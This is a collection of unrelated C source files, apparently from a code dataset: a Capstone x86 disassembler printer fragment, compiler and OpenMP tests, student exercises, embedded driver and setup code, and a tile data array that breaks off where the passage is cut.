MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.base = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.index = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.scale = 1; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = 0; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif } // If this has a segment register, print it. reg = MCOperand_getReg(SegReg); if (reg) { _printOperand(MI, Op + 1, O); SStream_concat0(O, ":"); if (MI->csh->detail) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = reg; } } SStream_concat0(O, "["); if (MCOperand_isImm(DispSpec)) { int64_t imm = MCOperand_getImm(DispSpec); if (MI->csh->detail) MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = imm; if (imm < 0) printImm(MI->csh->syntax, O, arch_masks[MI->csh->mode] & imm, true); else printImm(MI->csh->syntax, O, imm, true); } SStream_concat0(O, "]"); if (MI->csh->detail) MI->flat_insn->detail->x86.op_count++; if (MI->op1_size == 0) MI->op1_size = MI->x86opsize; } #ifndef CAPSTONE_X86_REDUCE static void printU8Imm(MCInst *MI, unsigned Op, SStream *O) { uint8_t val = MCOperand_getImm(MCInst_getOperand(MI, Op)) & 0xff; printImm(MI->csh->syntax, O, val, true); if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_IMM; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].imm = val; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif MI->flat_insn->detail->x86.op_count++; } } #endif static void printMemOffs8(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "byte ptr "); MI->x86opsize = 1; printMemOffset(MI, OpNo, O); } static void printMemOffs16(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "word ptr "); MI->x86opsize = 2; printMemOffset(MI, OpNo, O); } static void printMemOffs32(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "dword ptr "); MI->x86opsize = 4; printMemOffset(MI, OpNo, O); } static void printMemOffs64(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "qword ptr "); MI->x86opsize = 8; printMemOffset(MI, OpNo, O); } #ifndef CAPSTONE_DIET static char *printAliasInstr(MCInst *MI, SStream *OS, void *info); #endif static void printInstruction(MCInst *MI, SStream *O, MCRegisterInfo *MRI); void X86_Intel_printInst(MCInst *MI, SStream *O, void *Info) { #ifndef CAPSTONE_DIET char *mnem; #endif x86_reg reg, reg2; enum cs_ac_type access1, access2; // perhaps this instruction does not need printer if (MI->assembly[0]) { strncpy(O->buffer, MI->assembly, sizeof(MI->assembly)); return; } #ifndef CAPSTONE_DIET // Try to print any aliases first. mnem = printAliasInstr(MI, O, Info); if (mnem) cs_mem_free(mnem); else #endif printInstruction(MI, O, Info); reg = X86_insn_reg_intel(MCInst_getOpcode(MI), &access1); if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6] = {0}; #endif // first op can be embedded in the asm by llvm. // so we have to add the missing register as the first operand if (reg) { // shift all the ops right to leave 1st slot for this new register op memmove(&(MI->flat_insn->detail->x86.operands[1]), &(MI->flat_insn->detail->x86.operands[0]), sizeof(MI->flat_insn->detail->x86.operands[0]) * (ARR_SIZE(MI->flat_insn->detail->x86.operands) - 1)); MI->flat_insn->detail->x86.operands[0].type = X86_OP_REG; MI->flat_insn->detail->x86.operands[0].reg = reg; MI->flat_insn->detail->x86.operands[0].size = MI->csh->regsize_map[reg]; MI->flat_insn->detail->x86.operands[0].access = access1; MI->flat_insn->detail->x86.op_count++; } else { if (X86_insn_reg_intel2(MCInst_getOpcode(MI), &reg, &access1, &reg2, &access2)) { MI->flat_insn->detail->x86.operands[0].type = X86_OP_REG; MI->flat_insn->detail->x86.operands[0].reg = reg; MI->flat_insn->detail->x86.operands[0].size = MI->csh->regsize_map[reg]; MI->flat_insn->detail->x86.operands[0].access = access1; MI->flat_insn->detail->x86.operands[1].type = X86_OP_REG; MI->flat_insn->detail->x86.operands[1].reg = reg2; MI->flat_insn->detail->x86.operands[1].size = MI->csh->regsize_map[reg2]; MI->flat_insn->detail->x86.operands[1].access = access2; MI->flat_insn->detail->x86.op_count = 2; } } #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[0].access = access[0]; MI->flat_insn->detail->x86.operands[1].access = access[1]; #endif } if (MI->op1_size == 0 && reg) MI->op1_size = MI->csh->regsize_map[reg]; } /// printPCRelImm - This is used to print an immediate value that ends up /// being encoded as a pc-relative value. static void printPCRelImm(MCInst *MI, unsigned OpNo, SStream *O) { MCOperand *Op = MCInst_getOperand(MI, OpNo); if (MCOperand_isImm(Op)) { int64_t imm = MCOperand_getImm(Op) + MI->flat_insn->size + MI->address; int opsize = X86_immediate_size(MI->Opcode); // truncat imm for non-64bit if (MI->csh->mode != CS_MODE_64) { imm = imm & 0xffffffff; } if (MI->csh->mode == CS_MODE_16 && (MI->Opcode != X86_JMP_4 && MI->Opcode != X86_CALLpcrel32)) imm = imm & 0xffff; // Hack: X86 16bit with opcode X86_JMP_4 if (MI->csh->mode == CS_MODE_16 && (MI->Opcode == X86_JMP_4 && MI->x86_prefix[2] != 0x66)) imm = imm & 0xffff; // CALL/JMP rel16 is special if (MI->Opcode == X86_CALLpcrel16 || MI->Opcode == X86_JMP_2) imm = imm & 0xffff; printImm(MI->csh->syntax, O, imm, true); if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_IMM; // if op_count > 0, then this operand's size is taken from the destination op if (MI->flat_insn->detail->x86.op_count > 0) MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->flat_insn->detail->x86.operands[0].size; else if (opsize > 0) MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = (uint8_t)opsize; else MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->imm_size; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].imm = imm; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif MI->flat_insn->detail->x86.op_count++; } if (MI->op1_size == 0) MI->op1_size = MI->imm_size; } } static void printOperand(MCInst *MI, unsigned OpNo, SStream *O) { MCOperand *Op = MCInst_getOperand(MI, OpNo); if (MCOperand_isReg(Op)) { unsigned int reg = MCOperand_getReg(Op); printRegName(O, reg); if (MI->csh->detail) { if (MI->csh->doing_mem) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.base = reg; } else { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_REG; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].reg = reg; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->csh->regsize_map[reg]; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif MI->flat_insn->detail->x86.op_count++; } } if (MI->op1_size == 0) MI->op1_size = MI->csh->regsize_map[reg]; } else if (MCOperand_isImm(Op)) { int64_t imm = MCOperand_getImm(Op); int opsize = X86_immediate_size(MCInst_getOpcode(MI)); if (opsize == 1) // print 1 byte immediate in positive form imm = imm & 0xff; // printf(">>> id = %u\n", MI->flat_insn->id); switch(MI->flat_insn->id) { default: printImm(MI->csh->syntax, O, imm, MI->csh->imm_unsigned); break; case X86_INS_MOVABS: // do not print number in negative form printImm(MI->csh->syntax, O, imm, true); break; case X86_INS_IN: case X86_INS_OUT: case X86_INS_INT: // do not print number in negative form imm = imm & 0xff; printImm(MI->csh->syntax, O, imm, true); break; case X86_INS_LCALL: case X86_INS_LJMP: // always print address in positive form if (OpNo == 1) { // ptr16 part imm = imm & 0xffff; opsize = 2; } printImm(MI->csh->syntax, O, imm, true); break; case X86_INS_AND: case X86_INS_OR: case X86_INS_XOR: // do not print number in negative form if (imm >= 0 && imm <= HEX_THRESHOLD) printImm(MI->csh->syntax, O, imm, true); else { imm = arch_masks[opsize? opsize : MI->imm_size] & imm; printImm(MI->csh->syntax, O, imm, true); } break; case X86_INS_RET: // RET imm16 if (imm >= 0 && imm <= HEX_THRESHOLD) printImm(MI->csh->syntax, O, imm, true); else { imm = 0xffff & imm; printImm(MI->csh->syntax, O, imm, true); } break; } if (MI->csh->detail) { if (MI->csh->doing_mem) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = imm; } else { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_IMM; if (opsize > 0) MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = (uint8_t)opsize; else if (MI->flat_insn->detail->x86.op_count > 0) { if (MI->flat_insn->id != X86_INS_LCALL && MI->flat_insn->id != X86_INS_LJMP) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->flat_insn->detail->x86.operands[0].size; } else MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->imm_size; } else MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->imm_size; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].imm = imm; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif MI->flat_insn->detail->x86.op_count++; } } } } static void printMemReference(MCInst *MI, unsigned Op, SStream *O) { bool NeedPlus = false; MCOperand *BaseReg = MCInst_getOperand(MI, Op + X86_AddrBaseReg); uint64_t ScaleVal = MCOperand_getImm(MCInst_getOperand(MI, Op + X86_AddrScaleAmt)); MCOperand *IndexReg = MCInst_getOperand(MI, Op + X86_AddrIndexReg); MCOperand *DispSpec = MCInst_getOperand(MI, Op + X86_AddrDisp); MCOperand *SegReg = MCInst_getOperand(MI, Op + X86_AddrSegmentReg); int reg; if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_MEM; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->x86opsize; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.base = MCOperand_getReg(BaseReg); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.index = MCOperand_getReg(IndexReg); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.scale = (int)ScaleVal; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = 0; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif } // If this has a segment register, print it. reg = MCOperand_getReg(SegReg); if (reg) { _printOperand(MI, Op + X86_AddrSegmentReg, O); if (MI->csh->detail) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = reg; } SStream_concat0(O, ":"); } SStream_concat0(O, "["); if (MCOperand_getReg(BaseReg)) { _printOperand(MI, Op + X86_AddrBaseReg, O); NeedPlus = true; } if (MCOperand_getReg(IndexReg)) { if (NeedPlus) SStream_concat0(O, " + "); _printOperand(MI, Op + X86_AddrIndexReg, O); if (ScaleVal != 1) SStream_concat(O, "*%u", ScaleVal); NeedPlus = true; } if (MCOperand_isImm(DispSpec)) { int64_t DispVal = MCOperand_getImm(DispSpec); if (MI->csh->detail) MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = DispVal; if (DispVal) { if (NeedPlus) { if (DispVal < 0) { SStream_concat0(O, " - "); printImm(MI->csh->syntax, O, -DispVal, true); } else { SStream_concat0(O, " + "); printImm(MI->csh->syntax, O, DispVal, true); } } else { // memory reference to an immediate address if (DispVal < 0) { printImm(MI->csh->syntax, O, arch_masks[MI->csh->mode] & DispVal, true); } else { printImm(MI->csh->syntax, O, DispVal, true); } } } else { // DispVal = 0 if (!NeedPlus) // [0] SStream_concat0(O, "0"); } } SStream_concat0(O, "]"); if (MI->csh->detail) MI->flat_insn->detail->x86.op_count++; if (MI->op1_size == 0) MI->op1_size = MI->x86opsize; } static void printanymem(MCInst *MI, unsigned OpNo, SStream *O) { switch(MI->Opcode) { default: break; case X86_LEA16r: MI->x86opsize = 2; break; case X86_LEA32r: case X86_LEA64_32r: MI->x86opsize = 4; break; case X86_LEA64r: MI->x86opsize = 8; break; } printMemReference(MI, OpNo, O); } #define GET_REGINFO_ENUM #include "X86GenRegisterInfo.inc" #define PRINT_ALIAS_INSTR #ifdef CAPSTONE_X86_REDUCE #include "X86GenAsmWriter1_reduce.inc" #else #include "X86GenAsmWriter1.inc" #endif #endif
the_stack_data/50138757.c
#include <stdio.h> #include <stdlib.h> int main (int argc, char** argv) { int i; int a[3] = {3, 4, 5}; int b = 4; int c = 6; int d = 8; // 4, 6, 8 printf("Test0 %d, %d, %d.\n", b, c, d); #pragma omp target map(to: b) map(from: c) map(tofrom: d) #pragma omp parallel for for (i = 0; i < 3; i++) { // 4, 0/random, 8 printf("Test1 %d, %d, %d.\n", b, c, d); b = 40; c = 60; d = 80; // 40, 60, 80 printf("Test2 %d, %d, %d.\n", b, c, d); } // 4, 60, 80 printf("Test3 %d, %d, %d.\n", b, c, d); return 0; }
the_stack_data/104828436.c
// // Created by rahul on 10/7/19. // #include <stdio.h> int strlenn(char *s) { int n=0; while(*s++!='\0') n++; return n; } int strlen2(char *s) { char *p=s; while(*p!='\0') p++; return p-s; } int main() { char c[]="rahul"; char *p; p=(c+0); printf("%c",*p); printf("%d",strlenn(p)); printf("%c",c[-2]);//minus subscript are legal but these are not in the range }
the_stack_data/165240.c
// RUN: %clang_profgen -o %t -O3 %s // RUN: env LLVM_PROFILE_FILE=%h.%t-%h.profraw_%h %run %t // RUN: %run uname -n > %t.n // RUN: llvm-profdata merge -o %t.profdata `cat %t.n`.%t-`cat %t.n`.profraw_`cat %t.n` // RUN: %clang_profuse=%t.profdata -o - -S -emit-llvm %s | FileCheck %s // REQUIRES: shell int main(int argc, const char *argv[]) { // CHECK: br i1 %{{.*}}, label %{{.*}}, label %{{.*}}, !prof ![[PD1:[0-9]+]] if (argc > 2) return 1; return 0; } // CHECK: ![[PD1]] = !{!"branch_weights", i32 1, i32 2}
the_stack_data/142506.c
// REQUIRES: x86-registered-target // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -S -o - < %s | FileCheck %s --check-prefix=PLAIN // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -S -ffunction-sections -o - < %s | FileCheck %s --check-prefix=FUNC_SECT // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -S -fdata-sections -o - < %s | FileCheck %s --check-prefix=DATA_SECT // Try again through a clang invocation of the ThinLTO backend. // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -O2 %s -flto=thin -emit-llvm-bc -o %t.o // RUN: llvm-lto -thinlto -o %t %t.o // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -O2 -x ir %t.o -fthinlto-index=%t.thinlto.bc -S -ffunction-sections -o - | FileCheck %s --check-prefix=FUNC_SECT // RUN: %clang_cc1 -triple x86_64-pc-linux-gnu -O2 -x ir %t.o -fthinlto-index=%t.thinlto.bc -S -fdata-sections -o - | FileCheck %s --check-prefix=DATA_SECT const int hello = 123; void world() {} // PLAIN-NOT: section // PLAIN: world: // PLAIN: section .rodata, // PLAIN: hello: // FUNC_SECT: section .text.world, // FUNC_SECT: world: // FUNC_SECT: section .rodata, // FUNC_SECT: hello: // DATA_SECT-NOT: .section // DATA_SECT: world: // DATA_SECT: .section .rodata.hello, // DATA_SECT: hello:
the_stack_data/225143230.c
#include <stdio.h> int BSearchRecur(int ar[], int first, int last, int target) { int mid; if(first > last) return -1; mid = (first+last)/2; if(ar[mid] == target) return mid; else if(target < ar[mid]) return BSearchRecur(ar, first, mid-1, target); else return BSearchRecur(ar, mid+1, last, target); } int main() { // .... return 0; }
the_stack_data/84706.c
#include <stdio.h> int main() { int a,b,c; printf("Input your numbers please\n"); scanf("%d %d",&a,&b); printf("Here is your Ans %d.4\n",a/b); return 0; }
the_stack_data/70449029.c
// RUN: %llvmgcc %s -S -o - void regnode(int op); void regnode(op) char op; { }
the_stack_data/43506.c
#include <assert.h> int main() { int x = 285; int y = 23; assert(x / y == 12); return 0; }
the_stack_data/64240.c
#include <stdio.h> #include <stdlib.h> int main(void) { // odd positions are keys, even are values int kv_array[12] = { 1,2,3,4,5,6,7,8,9,10,11,12 }; int size = sizeof(kv_array)/sizeof(int); int enc_input = 7; int sum = 0; for (int i = 0 ; i < size ; i+=2) { int key = kv_array[i]; int val = kv_array[i+1]; sum += (key == enc_input) * val; } printf("Encrypted key %d has value %d\n", enc_input, sum); return 0; }
the_stack_data/155273.c
#include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/types.h> #include <linux/spi/spidev.h> #include <stdio.h> // Address of the Device ID register #define DEVID 0x00 // Address of the register holding low-byte of x-axis acceleration #define DATAX0 0x32 // Position of read/write bit (R/W) in SPI command byte #define RW_BIT_POS 7 // Position of multi byte bit (MB) in SPI command byte #define MB_BIT_POS 6 int main() { int fd; unsigned char rx_buffer[7]; unsigned char tx_buffer[] = { // SPI Transaction 1: read Device ID register DEVID | (1 << RW_BIT_POS) & ~(1 << MB_BIT_POS), /* command: single byte (MB=0) read (R/W=1) from DEVID register */ 0x00, /* dummy byte sent when we receive data from ADXL345 */ // SPI Transaction 2: read acceleration from all three axes DATAX0 | (1 << RW_BIT_POS) | (1 << MB_BIT_POS), /* command: multi byte (MB=1) read (R/W=1) starting from DATAX0 register */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 /* 6 dummy bytes sent while we are receiving 6 bytes from ADXL345 (2 bytes per axis) */ }; // TODO: Initialize the spi_ioc_transfer structure array struct spi_ioc_transfer spi[] = { // Add your code here }; // Try to open SPI device fd = open("/dev/spidev0.0", O_RDWR); // Check for any errors if (fd < 0) { printf("Error while trying to open spi device.\n"); return -1; } // TODO: Set SPI parameters (mode, size, and speed) // TODO: Initiate an SPI transaction to obtain Device ID // Print the obtained Device ID printf("Device ID is 0x%x.\n", rx_buffer[1]); // Loop forever printing acceleration values every second for (;;) { // TODO: Initiate an SPI transaction to obtain acceleration values // Print the obtained acceleration values printf("X: %d\n", (rx_buffer[2] << 8) | (rx_buffer[1])); printf("Y: %d\n", (rx_buffer[4] << 8) | (rx_buffer[3])); printf("Z: %d\n", (rx_buffer[6] << 8) | (rx_buffer[5])); printf("--------\n"); sleep(1); } close(fd); return 0; }
the_stack_data/72013419.c
/****************************************************************************** * The MIT License * * Copyright (c) 2011, 2012 LeafLabs, LLC. * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to use, copy, * modify, merge, publish, distribute, sublicense, and/or sell copies * of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. *****************************************************************************/ /** * @file libmaple/stm32f1/timer.c * @author Marti Bolivar <[email protected]> * @brief STM32F1 timer. */ /* * 2015/07/06 * Note. The IRQ handlers which were initially in this file have been moved to timer.c * to resolve a linker issue in where some IRQ handlers were not being linked even though * they were being used. * This file has been retains for historical reasons, but can be moved at some time in the future * when full testing of the code in the new location has been completed. */
the_stack_data/193894246.c
/* * The setup file for USB related hardware on PMC-Sierra MSP processors. * * Copyright 2006 PMC-Sierra, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN * NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 675 Mass Ave, Cambridge, MA 02139, USA. */ #if defined(CONFIG_USB_EHCI_HCD) || defined(CONFIG_USB_GADGET) #include <linux/init.h> #include <linux/ioport.h> #include <linux/platform_device.h> #include <asm/mipsregs.h> #include <msp_regs.h> #include <msp_int.h> #include <msp_prom.h> #include <msp_usb.h> #if defined(CONFIG_USB_EHCI_HCD) static struct resource msp_usbhost0_resources[] = { [0] = { /* EHCI-HS operational and capabilities registers */ .start = MSP_USB0_HS_START, .end = MSP_USB0_HS_END, .flags = IORESOURCE_MEM, }, [1] = { .start = MSP_INT_USB, .end = MSP_INT_USB, .flags = IORESOURCE_IRQ, }, [2] = { /* MSBus-to-AMBA bridge register space */ .start = MSP_USB0_MAB_START, .end = MSP_USB0_MAB_END, .flags = IORESOURCE_MEM, }, [3] = { /* Identification and general hardware parameters */ .start = MSP_USB0_ID_START, .end = MSP_USB0_ID_END, .flags = IORESOURCE_MEM, }, }; static u64 msp_usbhost0_dma_mask = 0xffffffffUL; static struct mspusb_device msp_usbhost0_device = { .dev = { .name = "pmcmsp-ehci", .id = 0, .dev = { .dma_mask = &msp_usbhost0_dma_mask, .coherent_dma_mask = 0xffffffffUL, }, .num_resources = ARRAY_SIZE(msp_usbhost0_resources), .resource = msp_usbhost0_resources, }, }; #endif /* CONFIG_USB_EHCI_HCD */ #if defined(CONFIG_USB_GADGET) static struct resource msp_usbdev0_resources[] = { [0] = { /* EHCI-HS operational and capabilities registers */ .start = MSP_USB0_HS_START, .end = MSP_USB0_HS_END, .flags = IORESOURCE_MEM, }, [1] = { .start = MSP_INT_USB, .end = MSP_INT_USB, .flags = IORESOURCE_IRQ, }, [2] = { /* MSBus-to-AMBA bridge register space */ .start = MSP_USB0_MAB_START, .end = MSP_USB0_MAB_END, .flags = IORESOURCE_MEM, }, [3] = { /* Identification and general hardware parameters */ .start = MSP_USB0_ID_START, .end = MSP_USB0_ID_END, .flags = IORESOURCE_MEM, }, }; static u64 msp_usbdev_dma_mask = 0xffffffffUL; /* This may need to be converted to a mspusb_device, too. */ static struct mspusb_device msp_usbdev0_device = { .dev = { .name = "msp71xx_udc", .id = 0, .dev = { .dma_mask = &msp_usbdev_dma_mask, .coherent_dma_mask = 0xffffffffUL, }, .num_resources = ARRAY_SIZE(msp_usbdev0_resources), .resource = msp_usbdev0_resources, }, }; #endif /* CONFIG_USB_GADGET */ static int __init msp_usb_setup(void) { char *strp; char envstr[32]; struct platform_device *msp_devs[NUM_USB_DEVS]; unsigned int val; /* construct environment name usbmode */ /* set usbmode <host/device> as pmon environment var */ /* * Could this perhaps be integrated into the "features" env var? * Use the features key "U", and follow with "H" for host-mode, * "D" for device-mode. If it works for Ethernet, why not USB... * -- hammtrev, 2007/03/22 */ snprintf(&envstr[0], sizeof(envstr), "usbmode"); /* set default host mode */ val = 1; /* get environment string */ strp = prom_getenv(&envstr[0]); if (strp) { /* compare string */ if (!strcmp(strp, "device")) val = 0; } if (val) { #if defined(CONFIG_USB_EHCI_HCD) msp_devs[0] = &msp_usbhost0_device.dev; ppfinit("platform add USB HOST done %s.\n", msp_devs[0]->name); #else ppfinit("%s: echi_hcd not supported\n", __FILE__); #endif /* CONFIG_USB_EHCI_HCD */ } else { #if defined(CONFIG_USB_GADGET) /* get device mode structure */ msp_devs[0] = &msp_usbdev0_device.dev; ppfinit("platform add USB DEVICE done %s.\n" , msp_devs[0]->name); #else ppfinit("%s: usb_gadget not supported\n", __FILE__); #endif /* CONFIG_USB_GADGET */ } /* add device */ platform_add_devices(msp_devs, ARRAY_SIZE(msp_devs)); return 0; } subsys_initcall(msp_usb_setup); #endif /* CONFIG_USB_EHCI_HCD || CONFIG_USB_GADGET */
the_stack_data/72012791.c
/* * (C) Copyright 2005- ECMWF. * * This software is licensed under the terms of the Apache Licence Version 2.0 * which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. * In applying this licence, ECMWF does not waive the privileges and immunities * granted to it by virtue of its status as an intergovernmental organisation * nor does it submit to any jurisdiction. */ typedef long long int ll_t; typedef unsigned long long int ull_t; #if defined(LINUX) && defined(USE_MEMORY_MONITOR) #include <stdio.h> #include <stdlib.h> ll_t getstackusage_() { ll_t rc = 0; static int dont_bother = 0; if (dont_bother) { rc = -2; } else { FILE *statfile = fopen ("/proc/self/stat", "r"); if (!statfile) { dont_bother = 1; rc = -1; } else { char dm[80]; ull_t startstack, kstkesp; /* stack start & ESP, the 28th and 29th columns, respectively */ /* Maybe not the brightest coding, but has to suffice for now (SS) */ int nelem = fscanf(statfile, "%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %llu %llu ", dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,dm,&startstack,&kstkesp); if (nelem != 29) { dont_bother = 1; rc = -3; } else { rc = (ll_t)(startstack - kstkesp); } fclose(statfile); } } return rc; } #else ll_t getstackusage_() { return 0L; } #endif
the_stack_data/1262385.c
#include <stdint.h> const uint8_t titlemap_tiles8R[256][2][16]; const uint8_t titlemap_tiles8R[256][2][16] = { {{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,}, {0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,}}, {{0xAA,0x55,0xAA,0x55,0xBE,0xFF,0xAA,0x55,0x55,0xAA,0x55,0xAA,0x7D,0x70,0x55,0xAA,}, {0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x50,0x40,0x40,}}, {{0xAA,0x1C,0xFF,0x7F,0xE3,0x7F,0x9C,0x1C,0x55,0xFF,0x1C,0xE3,0x7F,0xE3,0x7F,0xFF,}, {0xA0,0xC0,0xA0,0xC0,0xA0,0xC0,0xA0,0xC0,0xA0,0xA0,0xC0,0xA0,0xC0,0xA0,0xC0,0xA0,}}, {{0xFF,0xE3,0xFF,0x9C,0xE3,0x9C,0x9C,0xE3,0xFF,0xFF,0xE3,0xE3,0x9C,0xE3,0xE3,0xFF,}, {0xB0,0xC0,0xB0,0xC0,0xB0,0xC0,0xB0,0xC0,0xC0,0xB0,0xC0,0xB0,0xC0,0xB0,0xC0,0xB0,}}, {{0xFF,0xC4,0xFF,0x85,0xE6,0x40,0xFF,0xA4,0x11,0xBF,0x30,0xE7,0x01,0xFF,0x0A,0xFB,}, 